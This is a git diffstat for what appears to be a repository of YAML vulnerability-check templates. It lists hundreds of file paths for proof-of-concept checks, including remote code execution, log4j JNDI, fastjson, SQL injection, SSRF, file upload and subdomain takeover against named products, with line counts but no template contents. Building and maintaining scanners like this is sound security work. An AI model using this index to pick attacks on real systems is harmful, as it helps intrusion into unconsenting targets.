poc/redis/exposed-redis.yaml | 24 +- .../Panabit-sy_addmount-rce.yaml | 2 + .../apache-flink-unauth-rce-355.yaml | 50 - .../apache-httpd-rce-362.yaml | 41 - .../apache-httpd-rce.yaml | 13 +- .../apache-solr-log4j-rce-372.yaml | 36 + .../apache-solr-log4j-rce.yaml | 63 +- .../cisco-cloudcenter-suite-log4j-rce.yaml | 63 - .../cisco-cloudcenter-suite-rce.yaml | 73 + .../code42-log4j-rce-1132.yaml | 36 +- ...4j-rce-1131.yaml => code42-log4j-rce.yaml} | 0 ...ml => core-chuangtian-cloud-rce-1211.yaml} | 0 .../custom-datadump-source-code-detect.yaml | 3 +- .../elex-woocommerce-xss-7199.yaml | 47 - .../elex-woocommerce-xss.yaml | 35 + .../eyou-email-rce-7380.yaml | 29 + .../eyou-email-rce-7382.yaml | 28 + poc/remote_code_execution/eyou-email-rce.yaml | 4 - .../fastjson-1-2-24-rce-7400.yaml | 21 +- .../fastjson-1-2-24-rce.yaml | 46 - .../fastjson-1-2-41-rce-7403.yaml | 17 +- .../fastjson-1-2-41-rce.yaml | 31 + .../fastjson-1-2-42-rce-7407.yaml | 17 +- ...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0 .../fastjson-1-2-43-rce-7411.yaml | 17 +- .../fastjson-1-2-43-rce-7412.yaml | 44 + .../fastjson-1-2-47-rce-7415.yaml | 19 +- .../fastjson-1-2-47-rce-7416.yaml | 9 +- .../fastjson-1-2-62-rce-7419.yaml | 43 + .../fastjson-1-2-67-rce-7424.yaml | 17 +- poc/remote_code_execution/forcepoint.yaml | 14 +- .../gitlab-rce-7692.yaml | 21 +- .../gitlab-rce-7693.yaml | 17 +- .../h3c-imc-rce-7868.yaml | 18 +- .../hashicorp-consul-rce-7890.yaml | 25 +- .../hashicorp-consul-rce-7891.yaml | 12 +- .../hiboss-rce-7945.yaml | 8 +- .../hiboss-rce-7947.yaml | 14 +- .../icewarp-webclient-rce-8133.yaml | 25 - .../jamf-log4j-jndi-rce-8214.yaml | 34 + .../jamf-log4j-jndi-rce.yaml | 38 - .../kubernetes-resource-report-8547.yaml | 4 - .../lotuscms-rce-8650.yaml | 25 - .../lotuscms-rce-8651.yaml | 10 +- .../lotuscms-rce-8652.yaml | 34 + .../lotuscms-rce-8653.yaml | 22 +- .../metersphere-plugin-rce-8836.yaml | 27 +- .../metersphere-plugin-rce.yaml | 52 + .../mirai-unknown-rce-8899.yaml | 34 - 
.../mobileiron-log4j-jndi-rce-8905.yaml | 35 +- .../mobileiron-log4j-jndi-rce-8906.yaml | 29 +- .../natshell-rce-9009.yaml | 3 +- .../natshell-rce-9012.yaml | 16 +- poc/remote_code_execution/netterce.yaml | 46 +- .../nuuo-nvrmini2-rce-9170.yaml | 23 - .../nuuo-nvrmini2-rce-9171.yaml | 12 +- poc/remote_code_execution/opensns-rce.yaml | 25 +- .../optilink-ont1gew-gpon-rce-9342.yaml | 13 +- .../optilink-ont1gew-gpon-rce-9343.yaml | 31 + .../oscommerce-rce-9408.yaml | 7 +- .../panabit-sy_addmount-rce.yaml | 22 + .../pdf-signer-ssti-to-rce-9470.yaml | 20 + .../pdf-signer-ssti-to-rce-9471.yaml | 3 +- .../pdf-signer-ssti-to-rce-9472.yaml | 22 - ...aml => phalcon-framework-source-9494.yaml} | 0 .../phalcon-framework-source-9496.yaml | 25 - ...ml => php-zerodium-backdoor-rce-9572.yaml} | 0 .../php-zerodium-backdoor-rce.yaml | 29 - .../powercreator-cms-rce-9645.yaml | 42 + .../powercreator-cms-rce.yaml | 37 + ...ang-next-generation-firewall-rce-9758.yaml | 32 + ...ang-next-generation-firewall-rce-9761.yaml | 41 + .../qvisdvr-deserialization-rce-9774.yaml | 1 - .../qvisdvr-deserialization-rce-9775.yaml | 26 +- .../rconfig-rce-9834.yaml | 20 +- .../ruijie-eg-rce-9926.yaml | 10 +- .../ruijie-eg-rce-9929.yaml | 11 +- .../salesforce-aura-9984.yaml | 16 +- .../salesforce-aura.yaml | 27 - .../samsung-wlan-ap-rce-10009.yaml | 23 +- .../samsung-wlan-ap-rce-10010.yaml | 9 +- poc/remote_code_execution/sangfor-BA-rce.yaml | 41 +- .../sangfor-ba-rce(1).yaml | 8 +- .../sangfor-ba-rce-10020.yaml | 22 + .../sangfor-ba-rce-10021.yaml | 13 +- .../seacms-rce-10101.yaml | 24 + .../showdoc-file-upload-rce-10227.yaml | 40 + .../simple-employee-rce-10279.yaml | 49 + .../simple-employee-rce-10280.yaml | 49 - .../{spon-ip-rce.yaml => spon-ip-rce(1).yaml} | 0 .../sponip-network-system-ping-rce-10421.yaml | 41 + .../springboot-h2-db-rce-10455.yaml | 2 +- ...e-10457.yaml => springboot-h2-db-rce.yaml} | 0 .../tamronos-rce-10649.yaml | 32 - .../tamronos-rce-10651.yaml | 7 +- .../thinkcmf-rce-10728.yaml | 
9 +- .../thinkcmf-rce-10729.yaml | 27 +- .../thinkphp-2-rce-10740.yaml | 27 - .../thinkphp-501-rce-10743.yaml | 39 - .../thinkphp-501-rce.yaml | 24 + .../thinkphp-5022-rce-10744.yaml | 27 + .../thinkphp-5022-rce-10746.yaml | 10 +- ...-rce.yaml => thinkphp-5022-rce-10747.yaml} | 0 .../thinkphp-5023-rce-10748.yaml | 25 - .../thinkphp-5023-rce-10751.yaml | 12 +- .../unifi-network-log4j-rce-10974.yaml | 16 +- .../unifi-network-log4j-rce-10976.yaml | 37 +- .../vercel-takeover-11000.yaml | 17 + .../vercel-takeover-11001.yaml | 17 - .../vercel-takeover.yaml | 31 +- .../vmware-horizon-log4j-jndi-rce-11034.yaml | 21 +- .../vmware-horizon-log4j-jndi-rce.yaml | 32 + .../vrealize-operations-log4j-rce-11070.yaml | 44 +- .../vrealize-operations-log4j-rce-11071.yaml | 17 +- .../webui-rce-11170.yaml | 21 - .../webui-rce-11174.yaml | 20 + poc/remote_code_execution/webui-rce.yaml | 1 + ...ls-verification-for-woocommerce-11271.yaml | 25 +- .../wordpress-rce-simplefilelist-11299.yaml | 35 +- .../wordpress-rce-simplefilelist-11304.yaml | 18 +- .../wordpress-woocommerce-listing-11338.yaml | 7 +- .../wordpress-woocommerce-listing-11339.yaml | 22 - .../wordpress-woocommerce-listing-11341.yaml | 23 + .../wordpress-woocommerce-sqli-11342.yaml | 6 +- .../wordpress-woocommerce-sqli-11345.yaml | 44 - .../workresources-rdp-11380.yaml | 2 +- poc/remote_code_execution/wp-force-ssl.yaml | 59 + ...-woocommerce-email-verification-11619.yaml | 47 +- .../wp-woocommerce-file-download-11620.yaml | 38 + .../wp-woocommerce-file-download.yaml | 25 - .../wp-xmlrpc-brute-force-11623.yaml | 2 +- poc/remote_code_execution/yapi-rce-11724.yaml | 27 +- poc/remote_code_execution/yapi-rce-11725.yaml | 86 + .../yarn-resourcemanager-rce-11734.yaml | 17 +- .../yarn-resourcemanager-rce-11737.yaml | 15 +- poc/ruby/grails-database-admin-console.yaml | 21 +- poc/ruby/rails-debug-mode-9806.yaml | 17 + poc/ruby/rails-debug-mode-9807.yaml | 17 - poc/ruby/rails-debug-mode.yaml | 17 +- 
.../rails-secret-token-disclosure-9809.yaml | 22 - .../rails-secret-token-disclosure-9810.yaml | 23 + poc/ruby/rails-secret-token-disclosure.yaml | 3 +- poc/ruby/rails6-xss-9797.yaml | 17 +- poc/ruby/rails6-xss-9798.yaml | 29 +- poc/samba/samba-config-9987.yaml | 34 - poc/samba/samba-config.yaml | 20 + poc/samba/samba-detect-9988.yaml | 8 +- poc/samba/samba-swat-panel.yaml | 16 +- poc/sap/Sap-redirect.yaml | 8 +- poc/sap/sap-hana-xsengine-panel.yaml | 18 +- poc/sap/sap-netweaver-detect-10042.yaml | 25 +- poc/sap/sap-netweaver-detect-10047.yaml | 30 - poc/sap/sap-netweaver-info-leak-10051.yaml | 24 + poc/sap/sap-netweaver-info-leak-10052.yaml | 28 - poc/sap/sap-netweaver-info-leak.yaml | 13 +- poc/sap/sap-netweaver-webgui.yaml | 20 - poc/sap/sap-recon-detect-10063.yaml | 30 - poc/sap/sap-redirect.yaml | 22 - poc/sap/sap-web-dispatcher-10078.yaml | 9 +- ...sap-web-dispatcher-admin-portal-10071.yaml | 32 + poc/sap/sapfiori-panel-10033.yaml | 26 + poc/sap/sapfiori-panel-10034.yaml | 30 - poc/search/aws-opensearch-login-649.yaml | 24 + poc/search/aws-opensearch-login-650.yaml | 25 - poc/search/aws-opensearch-login.yaml | 3 +- poc/search/elasticsearch-7194.yaml | 20 +- .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/search/jolokia-mbean-search-8363.yaml | 5 +- poc/search/jolokia-mbean-search.yaml | 13 +- poc/search/searchbar.yaml | 4 +- poc/search/searches.yaml | 42 - .../sensitive-storage-exposure-10143.yaml | 3 +- poc/sensitive/sensitive-storage-exposure.yaml | 30 - .../zenphoto-installation-sensitive-info.yaml | 33 - .../zenphoto-sensitive-info-11784.yaml | 28 + poc/sensitive/zenphoto-sensitive-info.yaml | 12 +- .../exposed-sharepoint-list-7345.yaml | 28 - .../exposed-sharepoint-list-7347.yaml | 8 +- poc/shopify/shopify-custom-token(1).yaml | 16 + poc/shopify/shopify-custom-token-10198.yaml | 13 - poc/shopify/shopify-custom-token-11860.yaml | 5 +- poc/shopify/shopify-private-token-11861.yaml | 16 - 
poc/shopify/shopify-private-token.yaml | 5 +- poc/shopify/shopify-takeover-10201.yaml | 26 - poc/shopify/shopify-takeover-10202.yaml | 12 +- poc/shopify/shopify-takeover-10204.yaml | 11 +- poc/smtp/easy-wp-smtp-listing-7156.yaml | 19 + poc/smtp/easy-wp-smtp-listing-7157.yaml | 21 - poc/smtp/easy-wp-smtp-listing.yaml | 5 +- poc/smtp/esmtprc-config-7258.yaml | 10 +- poc/smtp/esmtprc-config-7259.yaml | 11 +- poc/smtp/msmtp-config-8967.yaml | 42 + poc/social/api-instagram.yaml | 10 +- .../flow-flow-social-stream-xss-7524.yaml | 41 + poc/social/flow-flow-social-stream-xss.yaml | 27 - poc/social/linkedin-id-11853.yaml | 16 - poc/social/linkedin-id.yaml | 3 +- poc/social/sassy-social-share-10083.yaml | 23 + ...are-10087.yaml => sassy-social-share.yaml} | 0 poc/social/twitter-secret-10862.yaml | 3 +- poc/social/twitter-secret.yaml | 4 + poc/social/wp-socialfit-xss-11577.yaml | 4 +- poc/sql/74cms-sqli-9.yaml | 7 +- .../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0 poc/sql/CRMEB-sqli.yaml | 2 - poc/sql/GLPI-9.3.3-SQL-Injection.yaml | 19 +- poc/sql/adb-backup-enabled-60.yaml | 15 +- ...> android-debug-database-exposed-314.yaml} | 0 .../android-debug-database-exposed-315.yaml | 47 +- ...seipdb-384.yaml => api-abuseipdb-385.yaml} | 0 poc/sql/api-abuseipdb.yaml | 31 + poc/sql/buildbot-panel-803.yaml | 28 + poc/sql/buildbot-panel.yaml | 29 +- poc/sql/chamilo-lms-sqli-892.yaml | 37 - poc/sql/chamilo-lms-sqli.yaml | 26 + poc/sql/chanjet-crm-sqli.yaml | 21 + poc/sql/couchdb-adminparty-1235.yaml | 55 +- poc/sql/couchdb-adminparty-1237.yaml | 39 + poc/sql/couchdb-exposure-1238.yaml | 25 - poc/sql/couchdb-exposure-1239.yaml | 24 + poc/sql/couchdb-exposure-1241.yaml | 6 +- poc/sql/database-error-6771.yaml | 12 +- poc/sql/db-backup-lfi-6774.yaml | 25 - poc/sql/db-backup-lfi-6775.yaml | 30 + poc/sql/db-backup-lfi-6776.yaml | 11 +- poc/sql/db-backup-lfi.yaml | 4 - poc/sql/db-schema-6783.yaml | 38 + poc/sql/dbeaver-credentials-6780.yaml | 42 - poc/sql/dbeaver-credentials-6782.yaml | 11 +- 
...aml => dedecms-membergroup-sqli-6796.yaml} | 0 poc/sql/dedecms-membergroup-sqli-6798.yaml | 15 +- poc/sql/dotnetcms-sqli-7089.yaml | 22 +- poc/sql/dotnetcms-sqli.yaml | 25 - poc/sql/duomicms-sql-injection-7124.yaml | 27 + poc/sql/duomicms-sql-injection.yaml | 22 + poc/sql/ecology-syncuserinfo-sqli-7177.yaml | 19 +- poc/sql/ecology-syncuserinfo-sqli.yaml | 25 + .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/sql/etouch-v2-sqli-7266.yaml | 26 + poc/sql/etouch-v2-sqli-7267.yaml | 16 +- poc/sql/exposed-adb-7280.yaml | 7 +- poc/sql/exposed-adb-7281.yaml | 15 +- poc/sql/exposed-adb-7282.yaml | 22 + poc/sql/exposed-mysql-initial-7323.yaml | 17 +- poc/sql/exposed-mysql-initial-7324.yaml | 9 +- poc/sql/exposed-sqlite-manager-7349.yaml | 3 +- poc/sql/exposed-sqlite-manager.yaml | 18 +- poc/sql/firebase-database-7490.yaml | 4 +- poc/sql/glpi-9.3.3-sql-injection.yaml | 25 + poc/sql/grails-database-admin-console.yaml | 21 +- poc/sql/hasura-graphql-psql-exec-7899.yaml | 19 +- poc/sql/influxdb-detect-8160.yaml | 11 +- poc/sql/influxdb-detect.yaml | 11 +- poc/sql/jdbc-connection-string-8246.yaml | 7 +- poc/sql/kevinlab-bems-sqli-8457.yaml | 30 - poc/sql/kevinlab-bems-sqli-8459.yaml | 20 +- poc/sql/mdb-database-file-8795.yaml | 32 + poc/sql/mdb-database-file-8796.yaml | 33 - poc/sql/mdb-database-file.yaml | 19 +- poc/sql/mongodb-detect-8920.yaml | 20 + poc/sql/mongodb-detect.yaml | 20 +- poc/sql/mongodb-ops-manager.yaml | 19 +- poc/sql/mongodb-unauth-8925.yaml | 22 - poc/sql/mongodb-unauth-8928.yaml | 15 +- poc/sql/mysql-native-password-8981.yaml | 5 +- poc/sql/mysql-native-password.yaml | 21 +- poc/sql/odoo-database-manager-9202.yaml | 3 - poc/sql/odoo-database-manager-9204.yaml | 23 + poc/sql/odoo-database-manager-9205.yaml | 23 - poc/sql/openerp-database-9275.yaml | 18 - poc/sql/openerp-database-9277.yaml | 22 + poc/sql/openerp-database.yaml | 6 +- poc/sql/oracle-dbass-detect-9350.yaml | 1 - 
poc/sql/oracle-dbass-detect-9351.yaml | 21 - poc/sql/oracle-dbass-detect.yaml | 18 - poc/sql/oracle-dbcs-9353.yaml | 9 +- .../oracle-ebs-sqllog-disclosure-9369.yaml | 26 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +- .../pbootcms-database-file-download-9469.yaml | 29 + poc/sql/pbootcms-database-file-download.yaml | 20 +- poc/sql/phpmyadmin-sql-9534.yaml | 28 - poc/sql/phpmyadmin-sql.php-server.yaml | 5 - poc/sql/pikpikcusqli.yaml | 47 + poc/sql/puppetdb-detect-9717.yaml | 15 +- poc/sql/puppetdb-detect-9718.yaml | 11 +- poc/sql/quick-cms-sqli.yaml | 42 + poc/sql/seaCMS-sqli.yaml | 28 +- poc/sql/seacms-sqli-10103.yaml | 39 + poc/sql/sequoiadb-default-login-10150.yaml | 17 +- poc/sql/simple-crm-sql-injection-10275.yaml | 18 +- poc/sql/simple-crm-sql-injection-10277.yaml | 12 +- poc/sql/springboot-h2-db-rce-10455.yaml | 2 +- ...e-10457.yaml => springboot-h2-db-rce.yaml} | 0 poc/sql/sql-dump.yaml | 19 +- poc/sql/sql-injection.yaml | 94 +- poc/sql/sql-monitor.yaml | 20 +- poc/sql/sql-server-reporting-10509.yaml | 13 - poc/sql/sqli_header-10504.yaml | 23 - poc/sql/suspicious-sql-error-messages.yaml | 32 + poc/sql/symfony-database-config-10615.yaml | 13 +- poc/sql/symfony-database-config-10616.yaml | 17 - ...aml => symfony-database-config-10617.yaml} | 0 poc/sql/thumbs-db-disclosure-10761.yaml | 10 +- ...e.yaml => thumbs-db-disclosure-10763.yaml} | 0 poc/sql/tidb-unauth-10770.yaml | 23 + poc/sql/tidb-unauth-10772.yaml | 26 - poc/sql/time_sql_peremeter.yaml | 469 +- poc/sql/ucmdb-default-login-10868.yaml | 3 +- poc/sql/ucmdb-default-login-10871.yaml | 41 + ...in-10869.yaml => ucmdb-default-login.yaml} | 0 poc/sql/unauthenticated-influxdb-10903.yaml | 27 + poc/sql/unauthenticated-influxdb.yaml | 6 +- poc/sql/weiphp-sql-injection-11190.yaml | 11 +- poc/sql/wordpress-db-repair-11252.yaml | 35 + poc/sql/wordpress-woocommerce-sqli-11342.yaml | 6 +- poc/sql/wordpress-woocommerce-sqli-11345.yaml | 44 - poc/sql/wuzhicms-sqli-11659.yaml | 38 +- poc/sql/xdcms-sqli-11664.yaml | 
30 - poc/sql/xdcms-sqli-11666.yaml | 18 +- poc/sql/yongyou-jdbcRead.yaml | 35 +- poc/sql/yongyou-jdbcread.yaml | 42 + poc/sql/zcms-v3-sqli-11773.yaml | 23 - poc/sql/zcms-v3-sqli.yaml | 12 +- poc/sql/zhixiangOA-msglog.aspx-sql.yaml | 4 +- poc/sql_injection/74cms-sqli-9.yaml | 7 +- .../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0 poc/sql_injection/CRMEB-sqli.yaml | 2 - poc/sql_injection/chamilo-lms-sqli-892.yaml | 37 - poc/sql_injection/chamilo-lms-sqli.yaml | 26 + poc/sql_injection/chanjet-crm-sqli.yaml | 21 + ...aml => dedecms-membergroup-sqli-6796.yaml} | 0 .../dedecms-membergroup-sqli-6798.yaml | 15 +- poc/sql_injection/dotnetcms-sqli-7089.yaml | 22 +- poc/sql_injection/dotnetcms-sqli.yaml | 25 - .../ecology-syncuserinfo-sqli-7177.yaml | 19 +- .../ecology-syncuserinfo-sqli.yaml | 25 + poc/sql_injection/etouch-v2-sqli-7266.yaml | 26 + poc/sql_injection/etouch-v2-sqli-7267.yaml | 16 +- .../exposed-sqlite-manager-7349.yaml | 3 +- poc/sql_injection/exposed-sqlite-manager.yaml | 18 +- .../kevinlab-bems-sqli-8457.yaml | 30 - .../kevinlab-bems-sqli-8459.yaml | 20 +- poc/sql_injection/quick-cms-sqli.yaml | 42 + poc/sql_injection/seaCMS-sqli.yaml | 28 +- poc/sql_injection/seacms-sqli-10103.yaml | 39 + poc/sql_injection/sqli.yaml | 47 + poc/sql_injection/sqli_header-10504.yaml | 23 - .../wordpress-woocommerce-sqli-11342.yaml | 6 +- .../wordpress-woocommerce-sqli-11345.yaml | 44 - poc/sql_injection/wuzhicms-sqli-11659.yaml | 38 +- poc/sql_injection/xdcms-sqli-11664.yaml | 30 - poc/sql_injection/xdcms-sqli-11666.yaml | 18 +- poc/sql_injection/zcms-v3-sqli-11773.yaml | 23 - poc/sql_injection/zcms-v3-sqli.yaml | 12 +- poc/ssh/ssh-authorized-keys-10523.yaml | 22 +- poc/ssrf/cloudflare-image-ssrf-1021.yaml | 22 + poc/ssrf/cloudflare-image-ssrf-1023.yaml | 14 +- poc/ssrf/confluence-ssrf-sharelinks-1191.yaml | 31 +- poc/ssrf/confluence-ssrf-sharelinks-1192.yaml | 44 + poc/ssrf/confluence-ssrf-sharelinks-1193.yaml | 36 - poc/ssrf/hasura-graphql-ssrf-7905.yaml | 47 + 
poc/ssrf/hasura-graphql-ssrf.yaml | 10 +- poc/ssrf/openbmcs-ssrf-9261.yaml | 40 - poc/ssrf/openbmcs-ssrf.yaml | 27 + poc/ssrf/targa-camera-ssrf-10657.yaml | 3 +- poc/ssrf/umbraco-base-ssrf-10881.yaml | 28 +- poc/ssrf/umbraco-base-ssrf.yaml | 41 - poc/ssrf/vmware-vcenter-ssrf-11051.yaml | 19 +- poc/ssrf/vmware-vcenter-ssrf-11052.yaml | 16 +- ...0.yaml => w3c-total-cache-ssrf-11077.yaml} | 0 poc/ssrf/wp-multiple-theme-ssrf-11512.yaml | 4 - poc/ssrf/wp-multiple-theme-ssrf-11513.yaml | 27 + poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml | 15 +- poc/ssrf/yongyou-ssrf-11745.yaml | 18 - poc/ssrf/yongyou-ssrf.yaml | 7 +- poc/ssrf/zimbra-preauth-ssrf-11810.yaml | 14 +- poc/ssrf/zimbra-preauth-ssrf.yaml | 20 + .../aftership-takeover-205.yaml | 29 + .../agilecrm-takeover-208.yaml | 18 + .../agilecrm-takeover-209.yaml | 34 +- poc/subdomain_takeover/aha-takeover-214.yaml | 11 +- poc/subdomain_takeover/aha-takeover-215.yaml | 10 +- poc/subdomain_takeover/aha-takeover-216.yaml | 15 + ...eover-228.yaml => airee-takeover-226.yaml} | 0 .../anima-takeover-318.yaml | 19 - .../anima-takeover-319.yaml | 15 + .../announcekit-takeover-324.yaml | 49 +- .../announcekit-takeover.yaml | 58 +- .../azure-takeover-detection-683.yaml | 29 +- .../bigcartel-takeover-727.yaml | 23 - .../bigcartel-takeover-728.yaml | 24 + .../bigcartel-takeover.yaml | 12 +- .../bitbucket-takeover-738.yaml | 21 + .../bitbucket-takeover-739.yaml | 9 +- .../bitbucket-takeover-740.yaml | 21 - .../bitbucket-takeover.yaml | 19 +- .../brightcove-takeover-783.yaml | 19 + .../brightcove-takeover-784.yaml | 20 + .../brightcove-takeover-785.yaml | 15 - .../brightcove-takeover.yaml | 8 +- ...eover-857.yaml => canny-takeover-854.yaml} | 0 .../canny-takeover-856.yaml | 2 +- .../cargo-takeover-867.yaml | 19 + .../cargo-takeover-868.yaml | 15 - .../cargocollective-takeover-862.yaml | 17 - .../cargocollective-takeover-863.yaml | 21 + .../cargocollective-takeover-865.yaml | 3 +- .../elasticbeantalk-takeover-7188.yaml | 50 + 
.../elasticbeantalk-takeover.yaml | 6 + .../feedpress-takeover-7455.yaml | 2 +- .../flexbe-takeover-7505.yaml | 23 + poc/subdomain_takeover/flexbe-takeover.yaml | 14 +- .../flywheel-takeover-7525.yaml | 17 + poc/subdomain_takeover/flywheel-takeover.yaml | 20 +- .../freshdesk-takeover-7540.yaml | 22 - .../freshdesk-takeover-7541.yaml | 22 + .../freshdesk-takeover.yaml | 14 +- .../frontify-takeover-7542.yaml | 18 + poc/subdomain_takeover/frontify-takeover.yaml | 17 +- .../gemfury-takeover-7578.yaml | 16 + poc/subdomain_takeover/gemfury-takeover.yaml | 29 +- .../getresponse-takeover-7607.yaml | 15 - .../getresponse-takeover-7609.yaml | 15 + .../getresponse-takeover-7610.yaml | 5 +- .../ghost-takeover-7619.yaml | 16 + .../ghost-takeover-7620.yaml | 17 +- .../ghost-takeover-7621.yaml | 16 - .../gitbook-takeover-7627.yaml | 22 + poc/subdomain_takeover/gitbook-takeover.yaml | 16 +- .../hatenablog-takeover-7907.yaml | 15 + .../hatenablog-takeover-7909.yaml | 5 +- .../helpjuice-takeover-7925.yaml | 15 - .../helpjuice-takeover-7926.yaml | 19 + .../helprace-takeover-7930.yaml | 21 + .../helprace-takeover-7932.yaml | 20 - poc/subdomain_takeover/helprace-takeover.yaml | 17 +- .../helpscout-takeover-7933.yaml | 6 +- .../helpscout-takeover-7936.yaml | 16 + .../heroku-takeover-7943.yaml | 18 +- .../heroku-takeover-7944.yaml | 20 - poc/subdomain_takeover/heroku-takeover.yaml | 3 + .../hubspot-takeover-8077.yaml | 7 +- .../hubspot-takeover-8078.yaml | 3 +- .../intercom-takeover-8166.yaml | 17 + .../intercom-takeover-8167.yaml | 21 - .../intercom-takeover-8169.yaml | 5 +- .../jazzhr-takeover-8235.yaml | 15 + .../jetbrains-takeover-8292.yaml | 16 + .../jetbrains-takeover-8294.yaml | 9 +- .../kinsta-takeover-8492.yaml | 8 +- .../kinsta-takeover-8495.yaml | 18 - .../landingi-takeover-8566.yaml | 17 + .../landingi-takeover-8567.yaml | 17 - poc/subdomain_takeover/landingi-takeover.yaml | 5 +- .../launchrock-takeover-8602.yaml | 16 - .../launchrock-takeover-8603.yaml | 3 +- 
.../launchrock-takeover-8605.yaml | 18 - .../mashery-takeover-8785.yaml | 2 +- poc/subdomain_takeover/medium-takeover.yaml | 7 +- .../ngrok-takeover-9126.yaml | 16 - .../ngrok-takeover-9128.yaml | 16 + .../pantheon-takeover-9458.yaml | 3 +- .../pantheon-takeover-9459.yaml | 19 - .../pingdom-takeover-9584.yaml | 16 - .../pingdom-takeover-9586.yaml | 16 + .../pingdom-takeover-9587.yaml | 2 +- .../proposify-takeover-9695.yaml | 15 - .../proposify-takeover-9696.yaml | 18 + .../proposify-takeover.yaml | 7 +- .../readme-takeover-9842.yaml | 19 + poc/subdomain_takeover/readme-takeover.yaml | 20 +- .../readthedocs-takeover-9844.yaml | 18 - .../readthedocs-takeover-9845.yaml | 8 +- .../readthedocs-takeover-9846.yaml | 15 + .../readthedocs-takeover-9847.yaml | 7 +- .../s3-subtakeover-9968.yaml | 20 - .../s3-subtakeover-9969.yaml | 24 + .../shopify-takeover-10201.yaml | 26 - .../shopify-takeover-10202.yaml | 12 +- .../shopify-takeover-10204.yaml | 11 +- poc/subdomain_takeover/short-io-takeover.yaml | 15 +- .../simplebooklet-takeover-10272.yaml | 19 - .../simplebooklet-takeover-10274.yaml | 18 + ...0324.yaml => smartjob-takeover-10322.yaml} | 0 ...326.yaml => smartling-takeover-10327.yaml} | 0 .../smartling-takeover.yaml | 4 +- .../smugmug-takeover-10338.yaml | 19 - .../smugmug-takeover-10339.yaml | 15 + .../smugmug-takeover-10340.yaml | 7 +- .../sprintful-takeover-10495.yaml | 7 +- .../sprintful-takeover.yaml | 21 +- .../strikingly-takeover-10550.yaml | 10 +- .../strikingly-takeover-10551.yaml | 17 + .../strikingly-takeover.yaml | 22 +- .../subdomain-takeover-dns-wildcards.yaml | 4 +- .../subdomain-takeover-dns.yaml | 4 +- .../surge-takeover-10578.yaml | 18 - .../surveygizmo-takeover-10583.yaml | 5 +- .../surveygizmo-takeover.yaml | 14 +- .../tave-takeover-10660.yaml | 16 + .../tave-takeover-10662.yaml | 18 - ...0670.yaml => teamwork-takeover-10668.yaml} | 0 .../tictail-takeover-10766.yaml | 17 + .../tictail-takeover-10767.yaml | 18 - ...r-10781.yaml => 
tilda-takeover-10783.yaml} | 0 .../tilda-takeover-10784.yaml | 6 +- .../tumblr-takeover-10845.yaml | 17 + .../tumblr-takeover-10847.yaml | 24 - poc/subdomain_takeover/tumblr-takeover.yaml | 26 +- .../uberflip-takeover-10864.yaml | 5 +- ...0971.yaml => unbounce-takeover-10970.yaml} | 0 poc/subdomain_takeover/unbounce-takeover.yaml | 33 +- ...9.yaml => uptimerobot-takeover-10987.yaml} | 0 .../uptimerobot-takeover-10988.yaml | 16 +- poc/subdomain_takeover/urge-takeover.yaml | 7 +- .../vend-takeover-10996.yaml | 15 - .../vend-takeover-10998.yaml | 15 + .../vend-takeover-10999.yaml | 5 +- .../vercel-takeover-11000.yaml | 17 + .../vercel-takeover-11001.yaml | 17 - poc/subdomain_takeover/vercel-takeover.yaml | 31 +- .../webflow-takeover-11131.yaml | 15 - .../webflow-takeover-11133.yaml | 15 + poc/subdomain_takeover/webflow-takeover.yaml | 2 +- .../wishpond-takeover-11216.yaml | 16 + .../wishpond-takeover-11217.yaml | 15 - .../wix-takeover-11219.yaml | 5 +- .../wordpress-takeover-11311.yaml | 6 +- .../wordpress-takeover-11312.yaml | 23 + .../wordpress-takeover-11313.yaml | 22 - .../worksites-takeover.yaml | 45 +- .../wufoo-takeover-11648.yaml | 17 + .../wufoo-takeover-11649.yaml | 18 - .../zendesk-takeover-11780.yaml | 15 - .../zendesk-takeover-11781.yaml | 16 + poc/subdomain_takeover/zendesk-takeover.yaml | 27 +- .../pdf-signer-ssti-to-rce-9470.yaml | 20 + .../pdf-signer-ssti-to-rce-9471.yaml | 3 +- .../pdf-signer-ssti-to-rce-9472.yaml | 22 - poc/template_injection/pikpikcussti.yaml | 25 + poc/template_injection/ssti.yaml | 3 - .../twig-php-ssti-10856.yaml | 15 + .../twig-php-ssti-10859.yaml | 1 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- .../exposed-jquery-file-upload-7313.yaml | 25 +- poc/upload/exposed-jquery-file-upload.yaml | 22 - ...9190.yaml => oa-v9-uploads-file-9191.yaml} | 0 ...file-9189.yaml => oa-v9-uploads-file.yaml} | 0 poc/upload/showdoc-file-upload-rce-10227.yaml | 40 + .../telerik-fileupload-detect-10692.yaml | 13 +- 
poc/upload/ueditor-file-upload-10872.yaml | 3 +- poc/upload/ueditor-file-upload-10875.yaml | 1 + .../unauthenticated-popup-upload-10921.yaml | 21 + ...yaml => unauthenticated-popup-upload.yaml} | 0 poc/upload/wp-upload-data-11605.yaml | 5 - ...n-11041.yaml => vmware-horizon-11040.yaml} | 0 .../vmware-horizon-log4j-jndi-rce-11034.yaml | 21 +- poc/vmware/vmware-horizon-log4j-jndi-rce.yaml | 32 + poc/vmware/vmware-vcenter-lfi-11047.yaml | 41 - .../vmware-vcenter-lfi-linux-11042.yaml | 2 +- poc/vmware/vmware-vcenter-lfi.yaml | 27 + poc/vmware/vmware-vcenter-ssrf-11051.yaml | 19 +- poc/vmware/vmware-vcenter-ssrf-11052.yaml | 16 +- poc/vmware/vmware-vrealize-detect-11058.yaml | 8 +- ...11057.yaml => vmware-vrealize-detect.yaml} | 0 ...-11059.yaml => vmware-workflow-11060.yaml} | 0 poc/vmware/vmware-workflow.yaml | 11 + poc/web/alphaweb-default-login.yaml | 35 - poc/web/artica-web-proxy-detect-544.yaml | 8 +- poc/web/artica-web-proxy-detect-545.yaml | 22 - ...-543.yaml => artica-web-proxy-detect.yaml} | 0 poc/web/axigen-webadmin-659.yaml | 16 +- poc/web/axigen-webadmin-660.yaml | 24 - poc/web/axigen-webmail.yaml | 43 - poc/web/azkaban-web-client-676.yaml | 32 - poc/web/azkaban-web-client-680.yaml | 30 + poc/web/boa-web-fileread-11846.yaml | 22 + poc/web/boa-web-server.yaml | 38 + 